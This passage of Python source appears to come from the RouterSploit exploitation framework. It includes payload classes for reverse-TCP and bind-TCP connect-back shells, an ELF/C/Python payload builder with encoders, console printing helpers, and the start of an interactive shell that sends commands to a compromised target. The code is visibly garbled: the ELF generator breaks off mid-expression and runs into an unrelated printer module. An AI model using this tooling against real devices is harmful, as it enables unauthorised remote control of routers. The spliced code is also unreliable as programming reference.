b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00" b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00" b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00" b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42" b"\x00\x10\x00\x00\x00\x00\x00\x00" ) } class ReverseTCPPayloadMixin(metaclass=ExploitOptionsAggregator): handler = PayloadHandlers.REVERSE_TCP lhost = OptIP('', 'Connect-back IP address') lport = OptPort(5555, 'Connect-back TCP Port') class BindTCPPayloadMixin(metaclass=ExploitOptionsAggregator): handler = PayloadHandlers.BIND_TCP rport = OptPort(5555, 'Bind Port') class BasePayload(BaseExploit): architecture = None handler = None encoder = OptString("", "Encoder") fmt = None def __init__(self): if self.handler not in PayloadHandlers: raise OptionValidationError( "Please use one of valid payload handlers: {}".format( PayloadHandlers._fields ) ) def generate(self): raise NotImplementedError("Please implement 'generate()' method") def run(self): raise NotImplementedError() def get_encoders(self): encoders = [] # get all encoders for given architecture all_encoders = [e for e in index_modules() if "encoders.{}".format(self.architecture) in e] for e in all_encoders: encoder = e.replace("encoders.{}.".format(self.architecture), "").replace(".", "/") module = getattr(importlib.import_module('routersploit.modules.' + e), "Encoder") encoders.append(( "{}/{}".format(self.architecture, encoder), module._Encoder__info__["name"], module._Encoder__info__["description"], )) return encoders def get_encoder(self, encoder): module_path = "routersploit/modules/encoders/{}".format(encoder).replace("/", ".") try: module = getattr(importlib.import_module(module_path), "Encoder") except ImportError: return None return module() class ArchitectureSpecificPayload(BasePayload): output = OptString("python", "Output type: elf/c/python") filepath = OptString("/tmp/{}".format(random_text(8)), "Output file to write") def __init__(self): super(ArchitectureSpecificPayload, self).__init__() if self.architecture not in Architectures: raise OptionValidationError( "Please use one of valid payload architectures: {}".format( Architectures._fields ) ) self.header = ARCH_ELF_HEADERS[self.architecture] self.bigendian = True if self.architecture.endswith("be") else False def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, "wb+") as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError( "No such option as {}".format(self.output) ) return content def generate_elf(self, data): elf = self.header + data if elf[4] == 1: # ELFCLASS32 - 32 bit if self.bigendian: p_filesz = pack(">L", len(elf)) p_memsz = pack(">L", len(elf) + len(data)) else: p_filesz = pack("Q", len(elf)) p_memsz = pack(">Q", len(elf) + len(data)) else: p_filesz = pack(" None: """ Print error message prefixing it with [-] """ __cprint("\033[91m[-]\033[0m", *args, **kwargs) def print_status(*args, **kwargs) -> None: """ Print status message prefixing it with [-] """ __cprint("\033[94m[*]\033[0m", *args, **kwargs) def print_success(*args, **kwargs) -> None: """ Print success message prefixing it with [-] """ __cprint("\033[92m[+]\033[0m", *args, **kwargs) def print_info(*args, **kwargs) -> None: """ Print info message prefixing it with [-] """ __cprint(*args, **kwargs) def print_table(headers, *args, **kwargs) -> None: """ Print table. example: Name Current setting Description ---- --------------- ----------- option_name value description foo bar baz foo bar baz :param headers: Headers names ex.('Name, 'Current setting', 'Description') :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ... :param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content :return: """ extra_fill = kwargs.get("extra_fill", 5) header_separator = kwargs.get("header_separator", "-") if not all(map(lambda x: len(x) == len(headers), args)): print_error("Headers and table rows tuples should be the same length.") return def custom_len(x): try: return len(x) except TypeError: return 0 fill = [] headers_line = ' ' headers_separator_line = ' ' for idx, header in enumerate(headers): column = [custom_len(arg[idx]) for arg in args] column.append(len(header)) current_line_fill = max(column) + extra_fill fill.append(current_line_fill) headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill))) headers_separator_line = "".join(( headers_separator_line, "{:<{}}".format(header_separator * len(header), current_line_fill) )) print_info() print_info(headers_line) print_info(headers_separator_line) for arg in args: content_line = " " for idx, element in enumerate(arg): content_line = "".join(( content_line, "{:<{}}".format(str(element), fill[idx]) )) print_info(content_line) print_info() def pprint_dict_in_order(dictionary, order=None) -> None: """ Pretty dict print. Pretty printing dictionary in specific order. (as in 'show info' command) Keys not mentioned in *order* parameter will be printed in random order. ex. pprint_dict_in_order({'name': John, 'sex': 'male', "hobby": ["rugby", "golf"]}, ('sex', 'name')) Sex: male Name: John Hobby: - rugby - golf """ order = order or () def prettyprint(title, body): print_info("\n{}:".format(title.capitalize())) if not isinstance(body, str): for value_element in body: print_info("- ", value_element) else: print_info(body) keys = list(dictionary.keys()) for element in order: try: key = keys.pop(keys.index(element)) value = dictionary[key] except (KeyError, ValueError): pass else: prettyprint(element, value) for rest_keys in keys: prettyprint(rest_keys, dictionary[rest_keys]) def color_blue(string: str) -> str: """ Returns string colored with blue :param str string: :return str: """ return "\033[94m{}\033[0m".format(string) def color_green(string: str) -> str: """ Returns string colored with green :param str string: :return str: """ return "\033[92m{}\033[0m".format(string) def color_red(string: str) -> str: """ Returns string colored with red :param str string: :return str: """ return "\033[91m{}\033[0m".format(string) ================================================ FILE: routersploit/core/exploit/shell.py ================================================ try: import telnetlib except ImportError: import telnetlib3 as telnetlib import socket import binascii from http.server import BaseHTTPRequestHandler, HTTPServer import threading import time import importlib from routersploit.core.exploit.printer import ( printer_queue, print_info, print_error, print_success, print_status, print_table, ) from routersploit.core.exploit.utils import ( index_modules, random_text, ) def shell(exploit, architecture="", method="", payloads=None, **params): available_payloads = {} payload = None options = [] if architecture and method: # get all payloads for given architecture all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p] for p in all_payloads: module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload") # if method/arch is cmd then filter out payloads if method == "cmd": if getattr(module, "cmd") in payloads: available_payloads[p] = module else: available_payloads[p] = module print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("For further exploitation use 'show payloads' and 'set payload ' commands.") print_info() while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"]) cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": if not available_payloads: print_error("There are no available payloads for this exploit") continue print_status("Available payloads:") headers = ("Payload", "Name", "Description") data = [] for p, v in available_payloads.items(): data.append((p, v._Payload__info__["name"], v._Payload__info__["description"])) print_table(headers, *data) elif cmd.startswith("set payload "): if not available_payloads: print_error("There are no available payloads for this exploit") continue c = cmd.split(" ") if c[2] in available_payloads.keys(): payload = available_payloads[c[2]]() options = [] for option, attr in payload.exploit_attributes.items(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), attr[1]]) if payload.handler == "bind_tcp": options.append(["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set